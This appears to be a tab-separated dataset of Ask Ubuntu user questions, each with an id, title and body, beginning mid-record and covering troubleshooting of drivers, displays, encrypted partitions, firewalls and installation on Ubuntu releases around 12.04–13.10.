*-network unclaimed description : network controller product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 73 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : latency=0 resources : memory : f7900000-f7901fff *-network description : ethernet interface product : qca8171 gigabit ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 10 serial : 54 : be : f7:73:00 : bd size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx driverversion=1.2.3 duplex=full firmware=n/a ip=192.168.1.105 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:19 memory : f7800000-f783ffff ioport : d000 ( size=128 ) lspci shows what i think is the best description of the hardware . i should have checked this info from windows8 but now is too late . is there other way of finding out if this is the hardware or can i trust the info from lspci ? lspci 03:00.0 network controller : intel corporation wireless 7260 ( rev 73 ) 04:00.0 ethernet controller : qualcomm atheros qca8171 gigabit ethernet ( rev 10 ) from my limited knowledge , i think the driver is alx ( is it ? ) . below some info about it : modinfo alx filename : /lib/modules/3.8.0-34-generic/kernel/ubuntu/alx/alx.ko version : 1.2.3 license : dual bsd/gpl description : qualcomm atheros gigabit ethernet driver author : qualcomm corporation , < nic-devel @ qualcomm.com > srcversion : 896f432f7919e2b2c08b0b3 alias : pci : v00001969d000010a0sv*sd*bc*sc*i* alias : pci : v00001969d000010a1sv*sd*bc*sc*i* alias : pci : v00001969d00001090sv*sd*bc*sc*i* alias : pci : v00001969d00001091sv*sd*bc*sc*i* depends : mdio intree : y vermagic : 3.8.0-34-generic smp mod_unload modversions do i need to upgrade this driver or wait for a newer version ? thanks !
387203	blank desktop after upgrade from 12.04 to 12.10	my system : 32 bit , piv 2.4 ghz , 1gb ram , no graphic card , windows / ubuntu dual boot system . two days ago , i did upgrade , which went smoothly . after restarting system , and doing login , i see only blank desktop , no unity launcher or task bar , no gui , nothing . i can press ctrl+alt+t and open programs , but graphics looks very old . i was trying solutions posted on this forums , one of command sudo apt-get install -f gave following error , which i was getting previously also . below error : preconfiguring packages . . . dpkg : error : parsing file '/var/lib/dpkg/available ' near line 59 missing package name a fatal error occurred . please report this as a bug and include the files . /var/log/dist-upgrade/main.log and /var/log/dist-upgrade/apt.log in your report . the upgrade has aborted . your original sources list was saved in /etc/apt/sources list.distupgrade system error e : sub-process /usr/bin/dpkg/ returned an error code ( 2 )
387209	will the ubuntu touch work on sony xperia tipo ?	i want to get ubuntu touch for my tipo
387210	extending a luks encrypted partition	i 'm running ubuntu inside vmware with a luks encrypted root partition . i 'm following resize encrypted partitions ( from help.ubuntu.com ) and am stuck at step 11. ubuntu @ ubuntu : ~ $ sudo lvresize -l +10g /dev/ubuntu-vg/root extending logical volume root to 25.74 gib insufficient free space : 2560 extents needed , but only 4 available fdisk -l shows the additional space available on the physical drive , i 'm just not sure on what command is holding me back from using lvresize . ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 32.2 gb , 32212254720 bytes 255 heads , 63 sectors/track , 3916 cylinders , total 62914560 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000f36ef device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 41940991 20719617 5 extended /dev/sda5 501760 41940991 20719616 83 linux disk /dev/mapper/crypt1 : 21.2 gb , 21214789632 bytes 255 heads , 63 sectors/track , 2579 cylinders , total 41435136 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/crypt1 does n't contain a valid partition table disk /dev/mapper/ubuntu -- vg-root : 16.9 gb , 16903045120 bytes 255 heads , 63 sectors/track , 2055 cylinders , total 33013760 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-root does n't contain a valid partition table disk /dev/mapper/ubuntu -- vg-swap_1 : 4290 mb , 4290772992 bytes 255 heads , 63 sectors/track , 521 cylinders , total 8380416 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-swap_1 does n't contain a valid partition table info about my physical volume lvm > pvdisplay -- - physical volume -- - pv name /dev/dm-0 vg name ubuntu-vg pv size 19.76 gib / not usable 3.81 mib allocatable yes pe size 4.00 mib total pe 5057 free pe 4 allocated pe 5053 pv uuid b6dksk-nyal-wvai-0iuc-ku1j-pwzy-wwztlb
387212	keyboard failed to enable at startup	i added the following lines to /etc/initramfs-tools/modules : hid usbhid hid_generic ohci_pci but my ps/2 keyboard fail to enable at startup the only way that i can get around this issue is logging in from kernel 3.8 how to resolve this ?
387217	cups admin user and password saucy	i ca n't change settings on my cups printer . he asks me for a username and password i already added for me the usergroup lpadmin . but nothing changes after a restart of cups . still asking me for username and password and my user is not working .
387219	problem starting to guest-user	hello and thanks for read . today , i turned on my computer , and i used the guest user , but this not starting , immediately the screen return to user selection and it let me start . how can i do to resolve this problem ? also i ca n't do a new user , i do n't now why ! . please help me
387221	no hdmi output decteded	i 'm running ubuntu 13.10 and trying to connect to my tv using the hdmi port on my computer . but nothing happens when i plug it in , and clicking on detect displays in the display settings does nothing . how do i get it to detect hdmi ? xrandr : screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 32767 x 32767 lvds1 connected primary 1366x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1366x768 59.9*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis )
387223	current active processes file created on home folder	there is a file in my home folder that is being created called `` current-active-processes.tmp '' pid tty time cmd 1 ? 00:00:01 init 2 ? 00:00:00 kthreadd 3 ? 00:00:01 ksoftirqd/0 6 ? 00:00:00 migration/0 7 ? 00:00:00 watchdog/0 8 ? 00:00:00 migration/1 9 ? 00:00:03 kworker/1:0 10 ? 00:00:00 ksoftirqd/1 12 ? 00:00:00 watchdog/1 13 ? 00:00:00 migration/2 15 ? 00:00:00 ksoftirqd/2 16 ? 00:00:00 watchdog/2 17 ? 00:00:00 migration/3 19 ? 00:00:00 ksoftirqd/3 20 ? 00:00:00 watchdog/3 21 ? 00:00:00 migration/4 23 ? 00:00:00 ksoftirqd/4 24 ? 00:00:00 watchdog/4 25 ? 00:00:00 migration/5 27 ? 00:00:00 ksoftirqd/5 28 ? 00:00:00 watchdog/5 ... . there is no way to get rid of it and after delete it reapears in a second . is there a process that uses that file and is creating it every time ? i have no clue , does anyone knows ? thanks in advance ,
387226	color distortion on dual - boot laptop	i have only used ubuntu 13.10 for a while now , so bear with me . every time i login to the ubuntu desktop and open any program , the color goes blurry and it distorts , like , a lot . the top of the screen is copied to the bottom , half of the screen is sometimes black . that 's all i can tell you right now . the specs are below . specs : cpu - amd athlon x2 x64 ram - 3.00 gb ddr3 gpu - nvidia graphics card - specs for card unknown dual - boot : yes other os : microsoft windows vista x32 sp2 network adapter : atheros ar5007 802.11b/g wifi adapter , nvidia nforce 10/100/1000 mbps networking controller ubuntu partition space : 46.8 gb time to boot into ubuntu 13.10 : 2.4 sec
387227	ubuntu slow and laggy , hdd issue ?	dear fellow ubuntu users , for two years now i 've been using ubuntu . although i love the system , it 's quality is going downhill , steeply . every new update ( 12.10 , 13.04 , 13.10 ) the issues only seem to get worse . now my system laggs every other minute ( freezes for a couple of seconds ) and is unresponsive at times . firefox , for example , seems to crash every 10 minutes ( but only for a few seconds where a grey zone overlays the whole browser window ) . i figured my issues could be due to unity failing as i found many people on the internet with the same conclusion so i exchanged unity for gnome only to discover that it did n't fix anything ( it actually added to the problem ) . a second guess would have been a malfunctioning or slow hdd , running a benchmark yielded following results : /dev/sda : timing cached reads : 2 mb in 6.42 seconds = 319.19 kb/sec timing buffered disk reads : 2 mb in 4.38 seconds = 467.79 kb/sec which is extremely strange since i would n't expect cashed reading to be slower than buffered reading . so having said this , can anyone tell met whether i should be on the lookout for a new hdd or whether my os is in fact failing ? working for school has been extremely annoying with a laggy system like this and i desperately need a fix here . what i have tried/done : hdd benchmark installing gnome rather than unity reinstall every ubuntu os from 12.04 to 13.10 , thanks in advance !
387231	no sound after suspending ubuntu 13.04	this problem is already known but the given solution did n't work for me . when i suspend ubuntu , in resume i do n't have sound . the solution that work for is to force shut down ( by pressing the power on button for 5 seconds ) . restarting or shutting down the computer normally does n't help . i 've got similar problem when i restart from linux to windows , i do n't have mouse . the solution to get back the mouse is also to force shut down . i thought that problem is windows 8 but now i 'm sure that is ubuntu can someone could help or explain me the difference between force shut down and normal shut down . thanks in advance .
387233	how does ubuntu periodically scan scsi devices ?	i 'm hoping someone here can help me understand how ubuntu 12.04.3 scans the scsi bus periodically . i 've enabled scsi logging via this command : scsi_logging_level -e 3 -s 3 -m 2 when i plug in my blackberry 9800 , i see the following set of messages periodically ( charge mode , not umass mode ) : [ 102356.446327 ] sd 32:0:0:1 : done : success [ 102356.446331 ] sd 32:0:0:1 : result : hostbyte=did_ok driverbyte=driver_ok [ 102356.446335 ] sd 32:0:0:1 : cdb : test unit ready : 00 20 00 00 00 00 [ 102356.446343 ] sd 32:0:0:1 : sense key : not ready [ current ] [ 102356.446347 ] sd 32:0:0:1 : add . sense : medium not present [ 102356.446358 ] sd 32:0:0:0 : send : [ 102356.446361 ] sd 32:0:0:0 : cdb : test unit ready : 00 00 00 00 00 00 [ 102356.447168 ] sd 32:0:0:0 : done : success [ 102356.447172 ] sd 32:0:0:0 : result : hostbyte=did_ok driverbyte=driver_ok [ 102356.447176 ] sd 32:0:0:0 : cdb : test unit ready : 00 00 00 00 00 00 [ 102356.447183 ] sd 32:0:0:0 : sense key : not ready [ current ] [ 102356.447188 ] sd 32:0:0:0 : add . sense : medium not present finally , when i switch to umass mode , the medium is detected as present and the corresponding sd device nodes are created . everything is working as expected , but i would like to understand this functionality . so , what is triggering the periodic scan of the bus ? is there service somewhere which triggers this , or is this done directly by the kernel ? update i the messages are definitely coming from the kernel , so i believe that the kernel is responsible for the scanning of the scsi devices . however , it 's still not clear to me as to what is triggering the periodic rescan of my blackberry device .
387235	what is the newest version of php/mysql for ubuntu 10.04 ?	i 'm just trying to make sure i am getting the right information , since i wo n't have access to my server for a few days . so what is the newest version of php/mysql for ubuntu 10.04 ? i am currently running 5.2.3 and it looks as if 5.3.2 is the latest supported version . i am trying to install a new version of roundcube that required 5.3 and i need to upgrade soon . are there any considerations i should keep in mind before upgrading ? thanks ( and sorry for the dumb question )
387236	running ubuntu as persistent liveusb , truecrypt volume not mounting	i am running ubuntu as persistent liveusb on one usb thumb drive . i have another usb thumb drive setup as a truecrypt encryped drive . everything was working fine for a few days . but now , whenever i try to mount my usb encrypted drive , it fails and i receive the following error . **mount : according to mtab , truecrypt is already mounted on /tmp/.truecrypt_aux_mnt1** i have tried searching google with no success . i tried dismounting all and receive the message no volumes mounted . my fstab file looks like so : overlayfs / overlayfs rw 0 0 tmpfs /tmp tmpfs nosuid , nodev 0 0 how to fix this ?
387237	virtual hosting with a lamp server and ubuntu 12.04 with filezilla	i have 2 domains i wish to host on 1 server . i would like to know how i can add/remove/change my web sites only with filezilla .
387240	bumblebee on samsung chronos 7 and ubuntu 3.10 with non stop fans	i have a samsung chronos 7 with a nvidia optimus video card and despite a had read a ton of sites and tutorials i was never able to have my laptop working appropeately . i could never have power save and hardware potential ( when needed ) like i had on windows and for a time i gived up linux . these days i missed ubuntu and i was very pleased when i read that bumblebee was officialy supported by ubuntu 3.10 . so i have decided to give to ubuntu a new chance . i made a brand new instalation , updated the system and executed this command : sudo apt-get install bumblebee bumblebee-nvidia primus linux-headers-generic nothing more , nothing less.. after reboot the system i kept listening the fans ( not using the discrete card yet ) i with psensor i can see the internal temperature reaching 74c only with firefox open . some foruns says that the original drivers would be enough to deal with this , but it 's not working for me . any one have any idea what should i do next ?
387241	can i recover a former version of a libreoffice document ?	i 've searched high and low for an answer to this and have n't been able to find one , so hopefully someone here can help . i was working on an essay and had made substantial progress but had to take a break , so i saved it , closed libreoffice writer and walked away . when i came back to start work again and opened libreoffice writer , it said that the document had n't been saved and offered me a chance to recover it , which naturally and unthinkingly i took . however , the document it so helpfully restored ( and also overwrote my newer version with ) was in fact a previous version , so at the moment it looks like i 've lost several days ' worth of work . i 've checked ubuntu one , but it only has the updated version . i ca n't click 'versions ' in the file menu of libreoffice . i 've followed the instructions on this thread but with no joy ( there was nothing in the folder ) : http : //ask.libreoffice.org/en/question/6652/how-to-recover-former-version-of-document/ if anyone has any suggestions , i 'd be enormously grateful , because at the moment i 'm despairing slightly . thanks in advance .
387242	whole hardisk showing to install ubuntu	i made a live cd and then booted from it to install ubuntu when i got to the `` something else '' option it was only showing `` /dev/sda '' my partitions were not showing please help me i want to install it on a specific partition .
387243	do i need bios or uefi installation ?	i have a new asus zenbook here , and honestly i do n't know exactly the model and if it has bios or uefi . when i go into bios before booting , i see nothing that says uefi , and it looks pretty much like my bios on my old pcs . there is already a windows 7 installed . how can i find out if i need to install grub / grub2 in bios or uefi mode ?
387244	how to remove a record from bash tab completion options	every time i type `` ssh use '' in my bash terminal and press tab the command gets completed to `` ssh username.dreamhosters.com '' but that was not what i was looking for . how can i remove that entry from the list of possible completions ?
387247	bumblebee and multiple monitors	so , i 've successfully gotten bumblebee running on my laptop , but i 'd like to know if there 's any easy way to get a second monitor working out of the hdmi port on my laptop . because i 'm dual booting with windows , i can see that my laptop monitor is connected to my intel gpu and that the hdmi port is wired to the nvidia gpu . how would i go about getting a second monitor to display through the hdmi port ? i have n't found any conclusive guides out there on accomplishing this with bumblebee . if someone could help , that 'd be great .
387248	install files not showing !	still having install issues after the last few questions . i ca n't gain access into windows 7 , its registry is messed up . anyways i 've learned in my last few questions i 've asked here that the crashed registry is n't the install issue . but i 'm left baffled by why i can get past the loading screens and where i should see the install folder files but it just sits on the colorful screen ... what am i missing here ? how can i wipe my old os if i ca n't install a new one ?
387250	can not get wifi or hotspot connection	a friend of mine is using a asus 1015e-ds03 with 13.10 . after working just fine for over a week , suddenly after powering up , he can not get a wifi or hot spot connection . i 'm in ny and he 's in phoenix . what should he do next to diagnose ? thanks . ron
387251	can i safely create a new partition between two others ?	i am about to install ubuntu alongside windows . my disc is partitioned like this : /dev/hda1 - system reserved ( windows ) /dev/hda2 - ntfs windows users unallocated space 100gb /dev/hda3 - fat other data 60gb can i create an extended partition in the space between hda 2 and 3 ? will hda3 be renamed and if so , will that lead to data loss ? data is backed-up .
387252	the installer fails the disk space check	the installer fails the disk space check and errors with : âhas at least 4.4 gb available drive spaceâ i launch a terminal to display space : df -h filesystem size used avail use % mounted on /cow 944m 101m 844m 11 % / udev 937m 4.0k 937m 1 % /dev tmpfs 378m 784k 377m 1 % /run /dev/sr1 696m 696m 0 100 % /cdrom /dev/loop0 668m 668m 0 100 % /rofs tmpfs 944m 64k 944m 1 % /tmp none 5.0m 4.0k 5.0m 1 % /run/lock none 944m 116k 944m 1 % /run/shm i 'm not trying to dual boot . i 'm not trying a ubuntu vm . i want ubuntu to be the only os installed so prior to the install , i formatted the entire hard drive dedicating the entire drive to ubuntu . i actually tried two different formatting methods . i config 'd this hard drive as a slave in a win xp machine and : formatted the entire drive with xp 's disk manager interface formatted the entire drive via command prompt with the format command after both formatting methods , xp sees 120gb on this drive but ubuntu has the same failure during the install . how do i get past this ?
387254	will this wipe my hd ?	if i get xubuntu/ubuntu will it wipe my hard drive or delete all of my files ? ( i want my stuff ! ) my friend tells my ubuntu is great but i have windows 7 . i do n't want to lose all of my stuff !
387260	wine sound issues ( directx games only )	title kind of says the issue . whenever i run an application such as mari0 , which does n't use directx , sound is perfectly fine , but when i run apps such as runner 2 or limbo , which uses directx , the sound has issues , and sounds slowed down and laggy . i 'm also using play on linux to install my games . both those games ran perfectly when i first installed them , but now i 'm having that issue . the games work perfectly except for the sound . any suggestions ? specs : pc : hp compaq pro 6305 ram : 4gb ( 3.3 gb usable by ubuntu ) os : ubuntu 13.10 x64
387266	installing ubuntu 13.10 from usb - black screen with mouse pointer	i just built a computer with two sapphire hd7950 graphics cards . i 've tried installing both lubuntu and xubuntu ( for scrypt mining ) and in both cases the same thing happens . after the initial splash screen that just shows the logo and a loading thing , it goes to a black screen with a cursor . if i ctrl+alt f4 for example , it brings me to a xubuntu @ xubuntu terminal window . i would n't mind that much only having a terminal , but i 'd like to know how to get the gui back . thanks ! edit : i have also tried with lubuntu the `` nomodeset '' , which just displays a whole bunch of errors , most of them say squashfs error : unable to read data cache entry
387270	wifi troubles ubuntu 13.10	in ubuntu 13.10 i can no longer connect to the internet server for neither my home internet nor the mobile hotspot from my verizon phone . i however have no trouble connecting to wifi at my university , and my windows 7 partition also has no trouble connecting . it acknowledges the signal and `` connects '' in both cases , but my browser will not connect to the server , nor does my dropbox update , etc . neither of my roommates ( both mac ) have had trouble connecting to the wireless . the change was sudden , and did n't necessarily correspond to a recent update . my device is a lenovo t420s , and realtek 8188ce . in attempt to troubleshoot i 've tried ... using the ethernet cable , no avail . hard resetting the router , turning off password restriction , etc. , no avail . using a medialink usb wireless adapter , no avail . updating my kernel from 13.11- > 13.12 ( as suggested in a few forums ) , no avail .
387273	failure to install 12.04 32-bit on windows 7 machine	first off , i am not by any means an expert in the nit and grit of computers , i have some degree of competence , but mostly as of now am ignorant . i downloaded the 12.04 iso , and successfully burned it to a dvd . upon booting my windows 7 system , i anticipated simply opening up the boot manager and working from there , this did not work . i was eventually able to install ubuntu from within windows ( both from the dvd and later i tried using the windows installer ) . ubuntu installed , the computer rebooted , and how wonderful , i was in a nice ubuntu environment . now at this point when i restart the machine , it gets bogged down during start-up , and the boot manager fails to open ( as all other 'f ' tools fail to do as well ) . after some patience and keyboard spamming i am able to re-access windows , but never again can i witness the beauty of ubuntu . : ( . my gut it telling me this issue stems from the old age of the computer . i am working on a toshiba satellite with 2.75 gb of usable ram , an amd turion x2 dual-core mobile rm-72 2.10 ghz processor , ati radeon graphics , and its a 32-bit os , the computer initially came with vista pre-installed , and was upgraded to windows 7 in its lifetime ideally i would enjoy being completely rid of the windows 7 and just have a ubuntu machine ( as in no dual booting ) . but if this would be easier to mend whilst keeping dual boot capabilities , i will settle . thanks for any help / suggestions !
387275	firefox lost connection after shooting down zeitgeist	what was happening in the following situation ? firefox could n't connect to the internet , but sudo firefox could . i had 13.10 32b on lenovo with amd64 . the not so relevant story goes as follows : i was playing with unetbootin zeitgeist began crashing over and over ( the usual message : oh no ! a problem ! do you want to report ? ) i opened system monitor , there were 3 zeitgeists one ran by root other two by 'me' i shuted down the three firefox lost connection to internet ( i noticed when trying to load other page ) firefox did n't reconnected for about 20min then i ran sudo firefox : internet again by then the three zeitgeist had revived but none was run by root after restart everything was back to normal and zeitgeist did n't crashed anymore that is the one and only time zeitgeist has crashed also the one and only time i was playing with unetbootin what was that ?
387279	using google drive on an ubuntu tablet	i am interested in purchasing a tablet for school . i am interested in purchasing it to take notes , but i would like to do so in google drive for several reasons . as i have researched , i have found two major problems . most tablets do n't allow me to edit formulas in google drive nor make drawings . these are unacceptable because i am a computer engineering major which consists of formulas and making drawings . will the ubuntu tablet allow me to do this ? more specifically , create an outline and insert formulas using their latex editor and insert drawings ( using insert- > drawing ) , but draw using a stylus on the touch screen . note that these are all possible on ubuntu desktop on google chrome . also , will i be able to use google chrome with tabs ? if this is n't possible , could you point me to where i could get something that can ? thank you
387280	ufw problem : can not access certain pages	hello , i configured iptables using ufw to deny traffic from and to anywhere except my chosen ports . this is my /lib/ufw/user.rules : *filter : ufw-user-input - [ 0:0 ] : ufw-user-output - [ 0:0 ] : ufw-user-forward - [ 0:0 ] : ufw-before-logging-input - [ 0:0 ] : ufw-before-logging-output - [ 0:0 ] : ufw-before-logging-forward - [ 0:0 ] : ufw-user-logging-input - [ 0:0 ] : ufw-user-logging-output - [ 0:0 ] : ufw-user-logging-forward - [ 0:0 ] : ufw-after-logging-input - [ 0:0 ] : ufw-after-logging-output - [ 0:0 ] : ufw-after-logging-forward - [ 0:0 ] : ufw-logging-deny - [ 0:0 ] : ufw-logging-allow - [ 0:0 ] : ufw-user-limit - [ 0:0 ] : ufw-user-limit-accept - [ 0:0 ] # # # rules # # # # # # tuple # # # allow tcp 80 0.0.0.0/0 any 0.0.0.0/0 in -a ufw-user-input -p tcp -- dport 80 -j accept # # # tuple # # # allow tcp 443 0.0.0.0/0 any 0.0.0.0/0 in -a ufw-user-input -p tcp -- dport 443 -j accept # # # tuple # # # allow tcp 995 0.0.0.0/0 any 0.0.0.0/0 in -a ufw-user-input -p tcp -- dport 995 -j accept # # # tuple # # # allow tcp 80,443,465 0.0.0.0/0 any 0.0.0.0/0 out -a ufw-user-output -p tcp -m multiport -- dports 80,443,465 -j accept # # # tuple # # # deny any any 0.0.0.0/0 any 0.0.0.0/0 out -a ufw-user-output -j drop # # # end rules # # # # # # logging # # # -a ufw-after-logging-input -j log -- log-prefix `` [ ufw block ] `` -m limit -- limit $ -a ufw-after-logging-output -j log -- log-prefix `` [ ufw block ] `` -m limit -- limit $ -a ufw-after-logging-forward -j log -- log-prefix `` [ ufw block ] `` -m limit -- limi $ -i ufw-logging-deny -m state -- state invalid -j return -m limit -- limit 3/min - $ -a ufw-logging-deny -j log -- log-prefix `` [ ufw block ] `` -m limit -- limit 3/min - $ -a ufw-logging-allow -j log -- log-prefix `` [ ufw allow ] `` -m limit -- limit 3/min $ # # # end logging # # # # # # rate limiting # # # -a ufw-user-limit -m limit -- limit 3/minute -j log -- log-prefix `` [ ufw limit blo $ -a ufw-user-limit -j reject -a ufw-user-limit-accept -j accept # # # end rate limiting # # # commit but , trying to access youtube or launchpad is impossible . is there any port that i 'm missing to allow ?
387281	stuck in terminal	having a major problem at the moment , i have installed ubuntu 13.10 onto my custom built pc but once it is installed and restarted it tells me that i have been set to a low-graphic setting because of my graphics card ( gigabyte radeon r7 260x ) . it then proceeds to ask if i want to configure it and when i attempt to enter where ever i am supposed to go to configure it sets me right back to the option list asking if i want to configure the settings . so after giving up i accepted the low-graphics settings and it takes me straight to the terminal and so far i 'm stuck there after typing in numerous commands . i finally attempted to re-install and upon reinstalling and being prompted to select a language i decided to take a look at release notes and it actually gave me browser access ( which i 'm on right now ) and i 've even been successful in accessing the system files and downloading adobe flash just fine . what in the hell is going on ?
387282	failure to install ubuntu-13.10-desktop-amd64	below error is the one am getting on installation failure 12-07 01:25 error tasklist : [ errno 4 ] ioerror : < urlopen error ( 2 , 'getaddrinfo failed ' ) > traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\downloader.py '' , line 77 , in download file `` \lib\urlgrabber\grabber.py '' , line 927 , in urlgrab file `` \lib\urlgrabber\grabber.py '' , line 845 , in _retry file `` \lib\urlgrabber\grabber.py '' , line 913 , in retryfunc file `` \lib\urlgrabber\grabber.py '' , line 1001 , in __init__ file `` \lib\urlgrabber\grabber.py '' , line 1072 , in _do_open file `` \lib\urlgrabber\grabber.py '' , line 1188 , in _make_request urlgraberror : [ errno 4 ] ioerror : < urlopen error ( 2 , 'getaddrinfo failed ' ) > 12-07 01:25 debug tasklist : # cancelling tasklist 12-07 01:25 error root : [ errno 4 ] ioerror : < urlopen error ( 2 , 'getaddrinfo failed ' ) > traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\downloader.py '' , line 77 , in download file `` \lib\urlgrabber\grabber.py '' , line 927 , in urlgrab file `` \lib\urlgrabber\grabber.py '' , line 845 , in _retry file `` \lib\urlgrabber\grabber.py '' , line 913 , in retryfunc file `` \lib\urlgrabber\grabber.py '' , line 1001 , in __init__ file `` \lib\urlgrabber\grabber.py '' , line 1072 , in _do_open file `` \lib\urlgrabber\grabber.py '' , line 1188 , in _make_request urlgraberror : [ errno 4 ] ioerror : < urlopen error ( 2 , 'getaddrinfo failed ' ) > 12-07 01:25 error root : could not remove : c : \ubuntu\install\ubuntu-13.10-desktop-amd64.iso traceback ( most recent call last ) : file `` \lib\wubi\backends\common\backend.py '' , line 426 , in download_iso oserror : [ errno 13 ] permission denied : u'c : \\ubuntu\\install\\ubuntu-13.10-desktop-amd64.iso' 12-07 01:25 debug tasklist : new task download 12-07 01:25 error root : could not remove : c : \ubuntu\install\ubuntu-13.10-desktop-amd64.iso traceback ( most recent call last ) : file `` \lib\wubi\backends\common\backend.py '' , line 426 , in download_iso oserror : [ errno 13 ] permission denied : u'c : \\ubuntu\\install\\ubuntu-13.10-desktop-amd64.iso' 12-07 01:25 debug tasklist : new task download 12-07 01:25 error root : could not remove : c : \ubuntu\install\ubuntu-13.10-desktop-amd64.iso traceback ( most recent call last ) : file `` \lib\wubi\backends\common\backend.py '' , line 426 , in download_iso oserror : [ errno 13 ] permission denied : u'c : \\ubuntu\\install\\ubuntu-13.10-desktop-amd64.iso' 12-07 01:25 debug tasklist : new task download 12-07 01:25 error tasklist : could not retrieve the required installation files traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 600 , in get_iso exception : could not retrieve the required installation files 12-07 01:25 debug tasklist : # cancelling tasklist 12-07 01:25 debug tasklist : # finished tasklist
387285	asus k52jr 12.04 lts no backlight	backlight does not turn on after boot . i 've seen various answers as to how to fix the backlight , my issue is that i ca n't see anything on my screen via use of a torch or external monitor at all , so can not edit anything to change the backlights behaviour . if it helps i have installed this version alongside windows 7 as its my first time using ubuntu , and the backlight is on during the boot screen where i choose whether to boot into ubuntu or windows , and the `` ubuntu 12.04 '' screen with the loading 'dots ' below it is fine as well , its only after it boots into desktop that it turns off . how can i fix this ? edit : if it helps at all my laptop speccy information is as follows ; summary operating system windows 7 home premium 64-bit sp1 cpu intel core i3 350m @ 2.27ghz arrandale 32nm technology ram 6.00gb dual-channel ddr3 @ 532mhz ( 7-7-7-20 ) motherboard asustek computer inc. k52jr ( socket 989 ) graphics generic pnp monitor ( 1366x768 @ 60hz ) hp w1907 ( 1440x900 @ 60hz ) ati mobility radeon hd 5470 ( asustek computer inc ) storage 298gb western digital wdc wd3200bekt-00pvmt0 ata device ( sata ) optical drives matshita dvd-ram uj890as ata device dtsoft virtual cdrom device audio amd high definition audio device again as mentioned the monitor attached does not auto-detect when i boot into ubuntu , so i can not change anything from that .
387287	help with first try boot	i keep trying to install , and following the bootloader , but i keep getting this screen : no boot . even after clicking around and hitting the enter button , i 've had no luck . i keep getting this screen without change . can you help/give advice ?
387288	upgraded to 12.04.3 , no desktop ?	my desktop computer updated today from ( i think it was 11.04 , ca n't remember ) to 12.04.3 . now i ca n't get to my desktop . when i boot it up , i come to a screen that says : ubuntu 12.04.3 lts username-desktop tty1 username-desktop login : username password : welcome to ubuntu 12.04.3 lts ( gnu/linux 3.2.0-57-generic x86_64 ) documentation : https : //help.ubuntu.com/ the programs included with the ubuntu system are free software ; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright . ubuntu comes with absolutely no warranty , to the extent permitted by applicable law . username @ username-desktop : ~ $ _ i 've never seen this before and do n't know what to do to get back to my desktop . i 'm in the middle of typing a 10-page final paper that 's due tonight by midnight and i ca n't even access my desktop . help ! ! ! please ! !
387293	is there a version of windows installer compatible with windows 8 in the works ?	i notice that windows installer is not compatible with windows 8 . any plans to change this in the near future ?
387294	user for service ganglia no longer exists on reboot	i 've got a small cluster running ubuntu server 12.04.3 lts on all of the nodes . ganglia is running on it to monitor loads on the cluster , and for the most part it works great . one issue that i 'm having is that whenever i restart the nodes , on a significant number of them the ganlgia monitoring service , gmond , wo n't start . when i look at /var/log/syslog i see the error /usr/sbin/gmond [ 781 ] : user 'ganglia ' does not exist # 012 # 012 . this user gets created when ganglia was installed . why would n't it be there any more ? i originally installed ganglia on all of the nodes running apt-get install ganglia-monitor as root . any suggestions on how to fix this other than uninstalling and re-installing ganglia-monitor ( which only fixes it until the next reboot ) ?
387296	usb boot hangs on scanning hard disk partitions to create /etc/fstab	i 'm trying to dual boot windows 8 and ubuntu on a lenovo ideapad y510p . i shrank my windows 8 partition from ~900gb to ~600 gb ( leaving ~300gb ) for ubuntu . i have uefi . i have disable srt , fastboot , secureboot i created a bootable usb using universal usb installer with ubuntu 12.04.3 iso . i was unable to boot from usb so i changed bios setting to legacy boot and legacy first . when i boot from usb i get message that says press enter to continue or something , and then lots of messages fly by and ends with : scanning hard disk partitions to create /etc/fstab the process just hangs there any suggestions ?
387298	choose languages to translate to/from in freespeak	i installed freespeak 0.3.0 , a frontend to online translation engines but does not let me choose the language to translate to and from . prior to freespeak , i tried youtranslate which too did n't work . any fix/workarounds to get them work ? ( or any suggestions to alternative gui front-ends to esp . google 's translation engine would be really helpful . )
387299	how to map right shift to slash using xmodmap ?	how to map shift_r to slash ( / ) using xmodmap ?
